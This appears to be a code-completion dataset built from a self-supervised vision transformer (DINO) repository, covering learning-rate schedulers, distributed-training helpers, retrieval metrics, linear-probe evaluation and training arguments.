import torch.distributed as dist
from PIL import ImageFilter, ImageOps
def cosine_scheduler(base_value, final_value, epochs, niter_per_ep, warmup_epochs=0, start_warmup_value=0):
warmup_schedule = np.array([])
warmup_iters = warmup_epochs * niter_per_ep
if warmup_epochs > 0:
warmup_schedule = np.linspace(start_warmup_value, base_value, warmup_iters)
iters = np.arange(epochs * niter_per_ep - warmup_iters)
schedule = final_value + 0.5 * (base_value - final_value) * (1 + np.cos(np.pi * iters / len(iters)))
schedule = np.concatenate((warmup_schedule, schedule))
assert len(schedule) == epochs * niter_per_ep
return schedule | null |
161,717 | import os
import sys
import time
import math
import random
import datetime
import subprocess
from collections import defaultdict, deque
import numpy as np
import torch
from torch import nn
import torch.distributed as dist
from PIL import ImageFilter, ImageOps
The provided code snippet includes necessary dependencies for implementing the `bool_flag` function. Write a Python function `def bool_flag(s)` to solve the following problem:
Parse boolean arguments from the command line.
Here is the function:
def bool_flag(s):
"""
Parse boolean arguments from the command line.
"""
FALSY_STRINGS = {"off", "false", "0"}
TRUTHY_STRINGS = {"on", "true", "1"}
if s.lower() in FALSY_STRINGS:
return False
elif s.lower() in TRUTHY_STRINGS:
return True
else:
raise argparse.ArgumentTypeError("invalid value for a boolean flag") | Parse boolean arguments from the command line. |
161,718 | import os
import sys
import time
import math
import random
import datetime
import subprocess
from collections import defaultdict, deque
import numpy as np
import torch
from torch import nn
import torch.distributed as dist
from PIL import ImageFilter, ImageOps
The provided code snippet includes necessary dependencies for implementing the `fix_random_seeds` function. Write a Python function `def fix_random_seeds(seed=31)` to solve the following problem:
Fix random seeds.
Here is the function:
def fix_random_seeds(seed=31):
"""
Fix random seeds.
"""
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
np.random.seed(seed) | Fix random seeds. |
161,719 | import os
import sys
import time
import math
import random
import datetime
import subprocess
from collections import defaultdict, deque
import numpy as np
import torch
from torch import nn
import torch.distributed as dist
from PIL import ImageFilter, ImageOps
def get_world_size():
if not is_dist_avail_and_initialized():
return 1
return dist.get_world_size()
The provided code snippet includes necessary dependencies for implementing the `reduce_dict` function. Write a Python function `def reduce_dict(input_dict, average=True)` to solve the following problem:
Args: input_dict (dict): all the values will be reduced average (bool): whether to do average or sum Reduce the values in the dictionary from all processes so that all processes have the averaged results. Returns a dict with the same fields as input_dict, after reduction.
Here is the function:
def reduce_dict(input_dict, average=True):
"""
Args:
input_dict (dict): all the values will be reduced
average (bool): whether to do average or sum
Reduce the values in the dictionary from all processes so that all processes
have the averaged results. Returns a dict with the same fields as
input_dict, after reduction.
"""
world_size = get_world_size()
if world_size < 2:
return input_dict
with torch.no_grad():
names = []
values = []
# sort the keys so that they are consistent across processes
for k in sorted(input_dict.keys()):
names.append(k)
values.append(input_dict[k])
values = torch.stack(values, dim=0)
dist.all_reduce(values)
if average:
values /= world_size
reduced_dict = {k: v for k, v in zip(names, values)}
return reduced_dict | Args: input_dict (dict): all the values will be reduced average (bool): whether to do average or sum Reduce the values in the dictionary from all processes so that all processes have the averaged results. Returns a dict with the same fields as input_dict, after reduction. |
161,720 | import os
import sys
import time
import math
import random
import datetime
import subprocess
from collections import defaultdict, deque
import numpy as np
import torch
from torch import nn
import torch.distributed as dist
from PIL import ImageFilter, ImageOps
def get_sha():
cwd = os.path.dirname(os.path.abspath(__file__))
def _run(command):
return subprocess.check_output(command, cwd=cwd).decode('ascii').strip()
sha = 'N/A'
diff = "clean"
branch = 'N/A'
try:
sha = _run(['git', 'rev-parse', 'HEAD'])
subprocess.check_output(['git', 'diff'], cwd=cwd)
diff = _run(['git', 'diff-index', 'HEAD'])
diff = "has uncommited changes" if diff else "clean"
branch = _run(['git', 'rev-parse', '--abbrev-ref', 'HEAD'])
except Exception:
pass
message = f"sha: {sha}, status: {diff}, branch: {branch}"
return message | null |
161,721 | import os
import sys
import time
import math
import random
import datetime
import subprocess
from collections import defaultdict, deque
import numpy as np
import torch
from torch import nn
import torch.distributed as dist
from PIL import ImageFilter, ImageOps
def is_main_process():
return get_rank() == 0
def save_on_master(*args, **kwargs):
if is_main_process():
torch.save(*args, **kwargs) | null |
161,722 | import os
import sys
import time
import math
import random
import datetime
import subprocess
from collections import defaultdict, deque
import numpy as np
import torch
from torch import nn
import torch.distributed as dist
from PIL import ImageFilter, ImageOps
def setup_for_distributed(is_master):
"""
This function disables printing when not in master process
"""
import builtins as __builtin__
builtin_print = __builtin__.print
def print(*args, **kwargs):
force = kwargs.pop('force', False)
if is_master or force:
builtin_print(*args, **kwargs)
__builtin__.print = print
def init_distributed_mode(args):
# launched with torch.distributed.launch
if 'RANK' in os.environ and 'WORLD_SIZE' in os.environ:
args.rank = int(os.environ["RANK"])
args.world_size = int(os.environ['WORLD_SIZE'])
args.gpu = int(os.environ['LOCAL_RANK'])
# launched with submitit on a slurm cluster
elif 'SLURM_PROCID' in os.environ:
args.rank = int(os.environ['SLURM_PROCID'])
args.gpu = args.rank % torch.cuda.device_count()
# launched naively with `python main_dino.py`
# we manually add MASTER_ADDR and MASTER_PORT to env variables
elif torch.cuda.is_available():
print('Will run the code on one GPU.')
args.rank, args.gpu, args.world_size = 0, 0, 1
os.environ['MASTER_ADDR'] = '127.0.0.1'
os.environ['MASTER_PORT'] = '29500'
else:
print('Does not support training without GPU.')
sys.exit(1)
dist.init_process_group(
backend="nccl",
init_method=args.dist_url,
world_size=args.world_size,
rank=args.rank,
)
torch.cuda.set_device(args.gpu)
print('| distributed init (rank {}): {}'.format(
args.rank, args.dist_url), flush=True)
dist.barrier()
setup_for_distributed(args.rank == 0) | null |
161,723 | import os
import sys
import time
import math
import random
import datetime
import subprocess
from collections import defaultdict, deque
import numpy as np
import torch
from torch import nn
import torch.distributed as dist
from PIL import ImageFilter, ImageOps
The provided code snippet includes necessary dependencies for implementing the `accuracy` function. Write a Python function `def accuracy(output, target, topk=(1,))` to solve the following problem:
Computes the accuracy over the k top predictions for the specified values of k
Here is the function:
def accuracy(output, target, topk=(1,)):
"""Computes the accuracy over the k top predictions for the specified values of k"""
maxk = max(topk)
batch_size = target.size(0)
_, pred = output.topk(maxk, 1, True, True)
pred = pred.t()
correct = pred.eq(target.reshape(1, -1).expand_as(pred))
return [correct[:k].reshape(-1).float().sum(0) * 100. / batch_size for k in topk] | Computes the accuracy over the k top predictions for the specified values of k |
161,724 | import os
import sys
import time
import math
import random
import datetime
import subprocess
from collections import defaultdict, deque
import numpy as np
import torch
from torch import nn
import torch.distributed as dist
from PIL import ImageFilter, ImageOps
def _no_grad_trunc_normal_(tensor, mean, std, a, b):
# Cut & paste from PyTorch official master until it's in a few official releases - RW
# Method based on https://people.sc.fsu.edu/~jburkardt/presentations/truncated_normal.pdf
def norm_cdf(x):
# Computes standard normal cumulative distribution function
return (1. + math.erf(x / math.sqrt(2.))) / 2.
if (mean < a - 2 * std) or (mean > b + 2 * std):
warnings.warn("mean is more than 2 std from [a, b] in nn.init.trunc_normal_. "
"The distribution of values may be incorrect.",
stacklevel=2)
with torch.no_grad():
# Values are generated by using a truncated uniform distribution and
# then using the inverse CDF for the normal distribution.
# Get upper and lower cdf values
l = norm_cdf((a - mean) / std)
u = norm_cdf((b - mean) / std)
# Uniformly fill tensor with values from [l, u], then translate to
# [2l-1, 2u-1].
tensor.uniform_(2 * l - 1, 2 * u - 1)
# Use inverse cdf transform for normal distribution to get truncated
# standard normal
tensor.erfinv_()
# Transform to proper mean, std
tensor.mul_(std * math.sqrt(2.))
tensor.add_(mean)
# Clamp to ensure it's in the proper range
tensor.clamp_(min=a, max=b)
return tensor
def trunc_normal_(tensor, mean=0., std=1., a=-2., b=2.):
# type: (Tensor, float, float, float, float) -> Tensor
return _no_grad_trunc_normal_(tensor, mean, std, a, b) | null |
161,725 | import os
import sys
import time
import math
import random
import datetime
import subprocess
from collections import defaultdict, deque
import numpy as np
import torch
from torch import nn
import torch.distributed as dist
from PIL import ImageFilter, ImageOps
def get_params_groups(model):
regularized = []
not_regularized = []
for name, param in model.named_parameters():
if not param.requires_grad:
continue
# we do not regularize biases nor Norm parameters
if name.endswith(".bias") or len(param.shape) == 1:
not_regularized.append(param)
else:
regularized.append(param)
return [{'params': regularized}, {'params': not_regularized, 'weight_decay': 0.}] | null |
161,726 | import os
import sys
import time
import math
import random
import datetime
import subprocess
from collections import defaultdict, deque
import numpy as np
import torch
from torch import nn
import torch.distributed as dist
from PIL import ImageFilter, ImageOps
def has_batchnorms(model):
bn_types = (nn.BatchNorm1d, nn.BatchNorm2d, nn.BatchNorm3d, nn.SyncBatchNorm)
for name, module in model.named_modules():
if isinstance(module, bn_types):
return True
return False | null |
161,727 | import os
import sys
import time
import math
import random
import datetime
import subprocess
from collections import defaultdict, deque
import numpy as np
import torch
from torch import nn
import torch.distributed as dist
from PIL import ImageFilter, ImageOps
def compute_ap(ranks, nres):
"""
Computes average precision for given ranked indexes.
Arguments
---------
ranks : zerro-based ranks of positive images
nres : number of positive images
Returns
-------
ap : average precision
"""
# number of images ranked by the system
nimgranks = len(ranks)
# accumulate trapezoids in PR-plot
ap = 0
recall_step = 1. / nres
for j in np.arange(nimgranks):
rank = ranks[j]
if rank == 0:
precision_0 = 1.
else:
precision_0 = float(j) / rank
precision_1 = float(j + 1) / (rank + 1)
ap += (precision_0 + precision_1) * recall_step / 2.
return ap
The provided code snippet includes necessary dependencies for implementing the `compute_map` function. Write a Python function `def compute_map(ranks, gnd, kappas=[])` to solve the following problem:
Computes the mAP for a given set of returned results. Usage: map = compute_map (ranks, gnd) computes mean average precsion (map) only map, aps, pr, prs = compute_map (ranks, gnd, kappas) computes mean average precision (map), average precision (aps) for each query computes mean precision at kappas (pr), precision at kappas (prs) for each query Notes: 1) ranks starts from 0, ranks.shape = db_size X #queries 2) The junk results (e.g., the query itself) should be declared in the gnd stuct array 3) If there are no positive images for some query, that query is excluded from the evaluation
Here is the function:
def compute_map(ranks, gnd, kappas=[]):
"""
Computes the mAP for a given set of returned results.
Usage:
map = compute_map (ranks, gnd)
computes mean average precsion (map) only
map, aps, pr, prs = compute_map (ranks, gnd, kappas)
computes mean average precision (map), average precision (aps) for each query
computes mean precision at kappas (pr), precision at kappas (prs) for each query
Notes:
1) ranks starts from 0, ranks.shape = db_size X #queries
2) The junk results (e.g., the query itself) should be declared in the gnd stuct array
3) If there are no positive images for some query, that query is excluded from the evaluation
"""
map = 0.
nq = len(gnd) # number of queries
aps = np.zeros(nq)
pr = np.zeros(len(kappas))
prs = np.zeros((nq, len(kappas)))
nempty = 0
for i in np.arange(nq):
qgnd = np.array(gnd[i]['ok'])
# no positive images, skip from the average
if qgnd.shape[0] == 0:
aps[i] = float('nan')
prs[i, :] = float('nan')
nempty += 1
continue
try:
qgndj = np.array(gnd[i]['junk'])
except:
qgndj = np.empty(0)
# sorted positions of positive and junk images (0 based)
pos = np.arange(ranks.shape[0])[np.in1d(ranks[:,i], qgnd)]
junk = np.arange(ranks.shape[0])[np.in1d(ranks[:,i], qgndj)]
k = 0;
ij = 0;
if len(junk):
# decrease positions of positives based on the number of
# junk images appearing before them
ip = 0
while (ip < len(pos)):
while (ij < len(junk) and pos[ip] > junk[ij]):
k += 1
ij += 1
pos[ip] = pos[ip] - k
ip += 1
# compute ap
ap = compute_ap(pos, len(qgnd))
map = map + ap
aps[i] = ap
# compute precision @ k
pos += 1 # get it to 1-based
for j in np.arange(len(kappas)):
kq = min(max(pos), kappas[j]);
prs[i, j] = (pos <= kq).sum() / kq
pr = pr + prs[i, :]
map = map / (nq - nempty)
pr = pr / (nq - nempty)
return map, aps, pr, prs | Computes the mAP for a given set of returned results. Usage: map = compute_map (ranks, gnd) computes mean average precsion (map) only map, aps, pr, prs = compute_map (ranks, gnd, kappas) computes mean average precision (map), average precision (aps) for each query computes mean precision at kappas (pr), precision at kappas (prs) for each query Notes: 1) ranks starts from 0, ranks.shape = db_size X #queries 2) The junk results (e.g., the query itself) should be declared in the gnd stuct array 3) If there are no positive images for some query, that query is excluded from the evaluation |
161,728 | import os
import sys
import time
import math
import random
import datetime
import subprocess
from collections import defaultdict, deque
import numpy as np
import torch
from torch import nn
import torch.distributed as dist
from PIL import ImageFilter, ImageOps
def multi_scale(samples, model):
v = None
for s in [1, 1/2**(1/2), 1/2]: # we use 3 different scales
if s == 1:
inp = samples.clone()
else:
inp = nn.functional.interpolate(samples, scale_factor=s, mode='bilinear', align_corners=False)
feats = model(inp).clone()
if v is None:
v = feats
else:
v += feats
v /= 3
v /= v.norm()
return v | null |
161,729 | import argparse
import os
import uuid
from pathlib import Path
import main_dino
import submitit
def parse_args():
parser = argparse.ArgumentParser("Submitit for DINO", parents=[main_dino.get_args_parser()])
parser.add_argument("--ngpus", default=8, type=int, help="Number of gpus to request on each node")
parser.add_argument("--nodes", default=2, type=int, help="Number of nodes to request")
parser.add_argument("--timeout", default=2800, type=int, help="Duration of the job")
parser.add_argument("--partition", default="learnfair", type=str, help="Partition where to submit")
parser.add_argument("--use_volta32", action='store_true', help="Big models? Use this")
parser.add_argument('--comment', default="", type=str,
help='Comment to pass to scheduler, e.g. priority message')
return parser.parse_args() | null |
161,730 | import argparse
import os
import uuid
from pathlib import Path
import main_dino
import submitit
def get_shared_folder() -> Path:
user = os.getenv("USER")
if Path("/checkpoint/").is_dir():
p = Path(f"/checkpoint/{user}/experiments")
p.mkdir(exist_ok=True)
return p
raise RuntimeError("No shared folder available")
def get_init_file():
# Init file must not exist, but it's parent dir must exist.
os.makedirs(str(get_shared_folder()), exist_ok=True)
init_file = get_shared_folder() / f"{uuid.uuid4().hex}_init"
if init_file.exists():
os.remove(str(init_file))
return init_file | null |
161,731 | import os
import sys
import argparse
import cv2
import random
import colorsys
import requests
from io import BytesIO
import skimage.io
from skimage.measure import find_contours
import matplotlib.pyplot as plt
from matplotlib.patches import Polygon
import torch
import torch.nn as nn
import torchvision
from torchvision import transforms as pth_transforms
import numpy as np
from PIL import Image
import utils
import vision_transformer as vits
def apply_mask(image, mask, color, alpha=0.5):
for c in range(3):
image[:, :, c] = image[:, :, c] * (1 - alpha * mask) + alpha * mask * color[c] * 255
return image
def random_colors(N, bright=True):
"""
Generate random colors.
"""
brightness = 1.0 if bright else 0.7
hsv = [(i / N, 1, brightness) for i in range(N)]
colors = list(map(lambda c: colorsys.hsv_to_rgb(*c), hsv))
random.shuffle(colors)
return colors
def display_instances(image, mask, fname="test", figsize=(5, 5), blur=False, contour=True, alpha=0.5):
fig = plt.figure(figsize=figsize, frameon=False)
ax = plt.Axes(fig, [0., 0., 1., 1.])
ax.set_axis_off()
fig.add_axes(ax)
ax = plt.gca()
N = 1
mask = mask[None, :, :]
# Generate random colors
colors = random_colors(N)
# Show area outside image boundaries.
height, width = image.shape[:2]
margin = 0
ax.set_ylim(height + margin, -margin)
ax.set_xlim(-margin, width + margin)
ax.axis('off')
masked_image = image.astype(np.uint32).copy()
for i in range(N):
color = colors[i]
_mask = mask[i]
if blur:
_mask = cv2.blur(_mask,(10,10))
# Mask
masked_image = apply_mask(masked_image, _mask, color, alpha)
# Mask Polygon
# Pad to ensure proper polygons for masks that touch image edges.
if contour:
padded_mask = np.zeros((_mask.shape[0] + 2, _mask.shape[1] + 2))
padded_mask[1:-1, 1:-1] = _mask
contours = find_contours(padded_mask, 0.5)
for verts in contours:
# Subtract the padding and flip (y, x) to (x, y)
verts = np.fliplr(verts) - 1
p = Polygon(verts, facecolor="none", edgecolor=color)
ax.add_patch(p)
ax.imshow(masked_image.astype(np.uint8), aspect='auto')
fig.savefig(fname)
print(f"{fname} saved.")
return | null |
161,732 | import os
import argparse
import json
from pathlib import Path
import torch
from torch import nn
import torch.distributed as dist
import torch.backends.cudnn as cudnn
from torchvision import datasets
from torchvision import transforms as pth_transforms
from torchvision import models as torchvision_models
import utils
import vision_transformer as vits
def train(model, linear_classifier, optimizer, loader, epoch, n, avgpool):
linear_classifier.train()
metric_logger = utils.MetricLogger(delimiter=" ")
metric_logger.add_meter('lr', utils.SmoothedValue(window_size=1, fmt='{value:.6f}'))
header = 'Epoch: [{}]'.format(epoch)
for (inp, target) in metric_logger.log_every(loader, 20, header):
# move to gpu
inp = inp.cuda(non_blocking=True)
target = target.cuda(non_blocking=True)
# forward
with torch.no_grad():
if "vit" in args.arch:
intermediate_output = model.get_intermediate_layers(inp, n)
output = torch.cat([x[:, 0] for x in intermediate_output], dim=-1)
if avgpool:
output = torch.cat((output.unsqueeze(-1), torch.mean(intermediate_output[-1][:, 1:], dim=1).unsqueeze(-1)), dim=-1)
output = output.reshape(output.shape[0], -1)
else:
output = model(inp)
output = linear_classifier(output)
# compute cross entropy loss
loss = nn.CrossEntropyLoss()(output, target)
# compute the gradients
optimizer.zero_grad()
loss.backward()
# step
optimizer.step()
# log
torch.cuda.synchronize()
metric_logger.update(loss=loss.item())
metric_logger.update(lr=optimizer.param_groups[0]["lr"])
# gather the stats from all processes
metric_logger.synchronize_between_processes()
print("Averaged stats:", metric_logger)
return {k: meter.global_avg for k, meter in metric_logger.meters.items()}
def validate_network(val_loader, model, linear_classifier, n, avgpool):
linear_classifier.eval()
metric_logger = utils.MetricLogger(delimiter=" ")
header = 'Test:'
for inp, target in metric_logger.log_every(val_loader, 20, header):
# move to gpu
inp = inp.cuda(non_blocking=True)
target = target.cuda(non_blocking=True)
# forward
with torch.no_grad():
if "vit" in args.arch:
intermediate_output = model.get_intermediate_layers(inp, n)
output = torch.cat([x[:, 0] for x in intermediate_output], dim=-1)
if avgpool:
output = torch.cat((output.unsqueeze(-1), torch.mean(intermediate_output[-1][:, 1:], dim=1).unsqueeze(-1)), dim=-1)
output = output.reshape(output.shape[0], -1)
else:
output = model(inp)
output = linear_classifier(output)
loss = nn.CrossEntropyLoss()(output, target)
if linear_classifier.module.num_labels >= 5:
acc1, acc5 = utils.accuracy(output, target, topk=(1, 5))
else:
acc1, = utils.accuracy(output, target, topk=(1,))
batch_size = inp.shape[0]
metric_logger.update(loss=loss.item())
metric_logger.meters['acc1'].update(acc1.item(), n=batch_size)
if linear_classifier.module.num_labels >= 5:
metric_logger.meters['acc5'].update(acc5.item(), n=batch_size)
if linear_classifier.module.num_labels >= 5:
print('* Acc@1 {top1.global_avg:.3f} Acc@5 {top5.global_avg:.3f} loss {losses.global_avg:.3f}'
.format(top1=metric_logger.acc1, top5=metric_logger.acc5, losses=metric_logger.loss))
else:
print('* Acc@1 {top1.global_avg:.3f} loss {losses.global_avg:.3f}'
.format(top1=metric_logger.acc1, losses=metric_logger.loss))
return {k: meter.global_avg for k, meter in metric_logger.meters.items()}
class LinearClassifier(nn.Module):
"""Linear layer to train on top of frozen features"""
def __init__(self, dim, num_labels=1000):
super(LinearClassifier, self).__init__()
self.num_labels = num_labels
self.linear = nn.Linear(dim, num_labels)
self.linear.weight.data.normal_(mean=0.0, std=0.01)
self.linear.bias.data.zero_()
def forward(self, x):
# flatten
x = x.view(x.size(0), -1)
# linear layer
return self.linear(x)
def eval_linear(args):
utils.init_distributed_mode(args)
print("git:\n {}\n".format(utils.get_sha()))
print("\n".join("%s: %s" % (k, str(v)) for k, v in sorted(dict(vars(args)).items())))
cudnn.benchmark = True
# ============ building network ... ============
# if the network is a Vision Transformer (i.e. vit_tiny, vit_small, vit_base)
if args.arch in vits.__dict__.keys():
model = vits.__dict__[args.arch](patch_size=args.patch_size, num_classes=0)
embed_dim = model.embed_dim * (args.n_last_blocks + int(args.avgpool_patchtokens))
# if the network is a XCiT
elif "xcit" in args.arch:
model = torch.hub.load('facebookresearch/xcit:main', args.arch, num_classes=0)
embed_dim = model.embed_dim
# otherwise, we check if the architecture is in torchvision models
elif args.arch in torchvision_models.__dict__.keys():
model = torchvision_models.__dict__[args.arch]()
embed_dim = model.fc.weight.shape[1]
model.fc = nn.Identity()
else:
print(f"Unknow architecture: {args.arch}")
sys.exit(1)
model.cuda()
model.eval()
# load weights to evaluate
utils.load_pretrained_weights(model, args.pretrained_weights, args.checkpoint_key, args.arch, args.patch_size)
print(f"Model {args.arch} built.")
linear_classifier = LinearClassifier(embed_dim, num_labels=args.num_labels)
linear_classifier = linear_classifier.cuda()
linear_classifier = nn.parallel.DistributedDataParallel(linear_classifier, device_ids=[args.gpu])
# ============ preparing data ... ============
val_transform = pth_transforms.Compose([
pth_transforms.Resize(256, interpolation=3),
pth_transforms.CenterCrop(224),
pth_transforms.ToTensor(),
pth_transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)),
])
dataset_val = datasets.ImageFolder(os.path.join(args.data_path, "val"), transform=val_transform)
val_loader = torch.utils.data.DataLoader(
dataset_val,
batch_size=args.batch_size_per_gpu,
num_workers=args.num_workers,
pin_memory=True,
)
if args.evaluate:
utils.load_pretrained_linear_weights(linear_classifier, args.arch, args.patch_size)
test_stats = validate_network(val_loader, model, linear_classifier, args.n_last_blocks, args.avgpool_patchtokens)
print(f"Accuracy of the network on the {len(dataset_val)} test images: {test_stats['acc1']:.1f}%")
return
train_transform = pth_transforms.Compose([
pth_transforms.RandomResizedCrop(224),
pth_transforms.RandomHorizontalFlip(),
pth_transforms.ToTensor(),
pth_transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)),
])
dataset_train = datasets.ImageFolder(os.path.join(args.data_path, "train"), transform=train_transform)
sampler = torch.utils.data.distributed.DistributedSampler(dataset_train)
train_loader = torch.utils.data.DataLoader(
dataset_train,
sampler=sampler,
batch_size=args.batch_size_per_gpu,
num_workers=args.num_workers,
pin_memory=True,
)
print(f"Data loaded with {len(dataset_train)} train and {len(dataset_val)} val imgs.")
# set optimizer
optimizer = torch.optim.SGD(
linear_classifier.parameters(),
args.lr * (args.batch_size_per_gpu * utils.get_world_size()) / 256., # linear scaling rule
momentum=0.9,
weight_decay=0, # we do not apply weight decay
)
scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, args.epochs, eta_min=0)
# Optionally resume from a checkpoint
to_restore = {"epoch": 0, "best_acc": 0.}
utils.restart_from_checkpoint(
os.path.join(args.output_dir, "checkpoint.pth.tar"),
run_variables=to_restore,
state_dict=linear_classifier,
optimizer=optimizer,
scheduler=scheduler,
)
start_epoch = to_restore["epoch"]
best_acc = to_restore["best_acc"]
for epoch in range(start_epoch, args.epochs):
train_loader.sampler.set_epoch(epoch)
train_stats = train(model, linear_classifier, optimizer, train_loader, epoch, args.n_last_blocks, args.avgpool_patchtokens)
scheduler.step()
log_stats = {**{f'train_{k}': v for k, v in train_stats.items()},
'epoch': epoch}
if epoch % args.val_freq == 0 or epoch == args.epochs - 1:
test_stats = validate_network(val_loader, model, linear_classifier, args.n_last_blocks, args.avgpool_patchtokens)
print(f"Accuracy at epoch {epoch} of the network on the {len(dataset_val)} test images: {test_stats['acc1']:.1f}%")
best_acc = max(best_acc, test_stats["acc1"])
print(f'Max accuracy so far: {best_acc:.2f}%')
log_stats = {**{k: v for k, v in log_stats.items()},
**{f'test_{k}': v for k, v in test_stats.items()}}
if utils.is_main_process():
with (Path(args.output_dir) / "log.txt").open("a") as f:
f.write(json.dumps(log_stats) + "\n")
save_dict = {
"epoch": epoch + 1,
"state_dict": linear_classifier.state_dict(),
"optimizer": optimizer.state_dict(),
"scheduler": scheduler.state_dict(),
"best_acc": best_acc,
}
torch.save(save_dict, os.path.join(args.output_dir, "checkpoint.pth.tar"))
print("Training of the supervised linear classifier on frozen features completed.\n"
"Top-1 test accuracy: {acc:.1f}".format(acc=best_acc)) | null |
161,733 | import os
import sys
import pickle
import argparse
import torch
from torch import nn
import torch.distributed as dist
import torch.backends.cudnn as cudnn
from torchvision import models as torchvision_models
from torchvision import transforms as pth_transforms
from PIL import Image, ImageFile
import numpy as np
import utils
import vision_transformer as vits
from eval_knn import extract_features
def config_imname(cfg, i):
return os.path.join(cfg['dir_images'], cfg['imlist'][i] + cfg['ext']) | null |
161,734 | import os
import sys
import pickle
import argparse
import torch
from torch import nn
import torch.distributed as dist
import torch.backends.cudnn as cudnn
from torchvision import models as torchvision_models
from torchvision import transforms as pth_transforms
from PIL import Image, ImageFile
import numpy as np
import utils
import vision_transformer as vits
from eval_knn import extract_features
def config_qimname(cfg, i):
return os.path.join(cfg['dir_images'], cfg['qimlist'][i] + cfg['qext']) | null |
161,735 | import argparse
import os
import sys
import datetime
import time
import math
import json
from pathlib import Path
import numpy as np
from PIL import Image
import torch
import torch.nn as nn
import torch.distributed as dist
import torch.backends.cudnn as cudnn
import torch.nn.functional as F
from torchvision import datasets, transforms
from torchvision import models as torchvision_models
import utils
import vision_transformer as vits
from vision_transformer import DINOHead
torchvision_archs = sorted(name for name in torchvision_models.__dict__
if name.islower() and not name.startswith("__")
and callable(torchvision_models.__dict__[name]))
def get_args_parser():
parser = argparse.ArgumentParser('DINO', add_help=False)
# Model parameters
parser.add_argument('--arch', default='vit_small', type=str,
choices=['vit_tiny', 'vit_small', 'vit_base', 'xcit', 'deit_tiny', 'deit_small'] \
+ torchvision_archs + torch.hub.list("facebookresearch/xcit:main"),
help="""Name of architecture to train. For quick experiments with ViTs,
we recommend using vit_tiny or vit_small.""")
parser.add_argument('--patch_size', default=16, type=int, help="""Size in pixels
of input square patches - default 16 (for 16x16 patches). Using smaller
values leads to better performance but requires more memory. Applies only
for ViTs (vit_tiny, vit_small and vit_base). If <16, we recommend disabling
mixed precision training (--use_fp16 false) to avoid unstabilities.""")
parser.add_argument('--out_dim', default=65536, type=int, help="""Dimensionality of
the DINO head output. For complex and large datasets large values (like 65k) work well.""")
parser.add_argument('--norm_last_layer', default=True, type=utils.bool_flag,
help="""Whether or not to weight normalize the last layer of the DINO head.
Not normalizing leads to better performance but can make the training unstable.
In our experiments, we typically set this paramater to False with vit_small and True with vit_base.""")
parser.add_argument('--momentum_teacher', default=0.996, type=float, help="""Base EMA
parameter for teacher update. The value is increased to 1 during training with cosine schedule.
We recommend setting a higher value with small batches: for example use 0.9995 with batch size of 256.""")
parser.add_argument('--use_bn_in_head', default=False, type=utils.bool_flag,
help="Whether to use batch normalizations in projection head (Default: False)")
# Temperature teacher parameters
parser.add_argument('--warmup_teacher_temp', default=0.04, type=float,
help="""Initial value for the teacher temperature: 0.04 works well in most cases.
Try decreasing it if the training loss does not decrease.""")
parser.add_argument('--teacher_temp', default=0.04, type=float, help="""Final value (after linear warmup)
of the teacher temperature. For most experiments, anything above 0.07 is unstable. We recommend
starting with the default value of 0.04 and increase this slightly if needed.""")
parser.add_argument('--warmup_teacher_temp_epochs', default=0, type=int,
help='Number of warmup epochs for the teacher temperature (Default: 30).')
# Training/Optimization parameters
parser.add_argument('--use_fp16', type=utils.bool_flag, default=True, help="""Whether or not
to use half precision for training. Improves training time and memory requirements,
but can provoke instability and slight decay of performance. We recommend disabling
mixed precision if the loss is unstable, if reducing the patch size or if training with bigger ViTs.""")
parser.add_argument('--weight_decay', type=float, default=0.04, help="""Initial value of the
weight decay. With ViT, a smaller value at the beginning of training works well.""")
parser.add_argument('--weight_decay_end', type=float, default=0.4, help="""Final value of the
weight decay. We use a cosine schedule for WD and using a larger decay by
the end of training improves performance for ViTs.""")
parser.add_argument('--clip_grad', type=float, default=3.0, help="""Maximal parameter
gradient norm if using gradient clipping. Clipping with norm .3 ~ 1.0 can
help optimization for larger ViT architectures. 0 for disabling.""")
parser.add_argument('--batch_size_per_gpu', default=64, type=int,
help='Per-GPU batch-size : number of distinct images loaded on one GPU.')
parser.add_argument('--epochs', default=100, type=int, help='Number of epochs of training.')
parser.add_argument('--freeze_last_layer', default=1, type=int, help="""Number of epochs
during which we keep the output layer fixed. Typically doing so during
the first epoch helps training. Try increasing this value if the loss does not decrease.""")
parser.add_argument("--lr", default=0.0005, type=float, help="""Learning rate at the end of
linear warmup (highest LR used during training). The learning rate is linearly scaled
with the batch size, and specified here for a reference batch size of 256.""")
parser.add_argument("--warmup_epochs", default=10, type=int,
help="Number of epochs for the linear learning-rate warm up.")
parser.add_argument('--min_lr', type=float, default=1e-6, help="""Target LR at the
end of optimization. We use a cosine LR schedule with linear warmup.""")
parser.add_argument('--optimizer', default='adamw', type=str,
choices=['adamw', 'sgd', 'lars'], help="""Type of optimizer. We recommend using adamw with ViTs.""")
parser.add_argument('--drop_path_rate', type=float, default=0.1, help="stochastic depth rate")
# Multi-crop parameters
parser.add_argument('--global_crops_scale', type=float, nargs='+', default=(0.4, 1.),
help="""Scale range of the cropped image before resizing, relatively to the origin image.
Used for large global view cropping. When disabling multi-crop (--local_crops_number 0), we
recommand using a wider range of scale ("--global_crops_scale 0.14 1." for example)""")
parser.add_argument('--local_crops_number', type=int, default=8, help="""Number of small
local views to generate. Set this parameter to 0 to disable multi-crop training.
When disabling multi-crop we recommend to use "--global_crops_scale 0.14 1." """)
parser.add_argument('--local_crops_scale', type=float, nargs='+', default=(0.05, 0.4),
help="""Scale range of the cropped image before resizing, relatively to the origin image.
Used for small local view cropping of multi-crop.""")
# Misc
parser.add_argument('--data_path', default='/path/to/imagenet/train/', type=str,
help='Please specify path to the ImageNet training data.')
parser.add_argument('--output_dir', default=".", type=str, help='Path to save logs and checkpoints.')
parser.add_argument('--saveckp_freq', default=20, type=int, help='Save checkpoint every x epochs.')
parser.add_argument('--seed', default=0, type=int, help='Random seed.')
parser.add_argument('--num_workers', default=10, type=int, help='Number of data loading workers per GPU.')
parser.add_argument("--dist_url", default="env://", type=str, help="""url used to set up
distributed training; see https://pytorch.org/docs/stable/distributed.html""")
parser.add_argument("--local_rank", default=0, type=int, help="Please ignore and do not set this argument.")
return parser | null |
161,736 | import argparse
import os
import sys
import datetime
import time
import math
import json
from pathlib import Path
import numpy as np
from PIL import Image
import torch
import torch.nn as nn
import torch.distributed as dist
import torch.backends.cudnn as cudnn
import torch.nn.functional as F
from torchvision import datasets, transforms
from torchvision import models as torchvision_models
import utils
import vision_transformer as vits
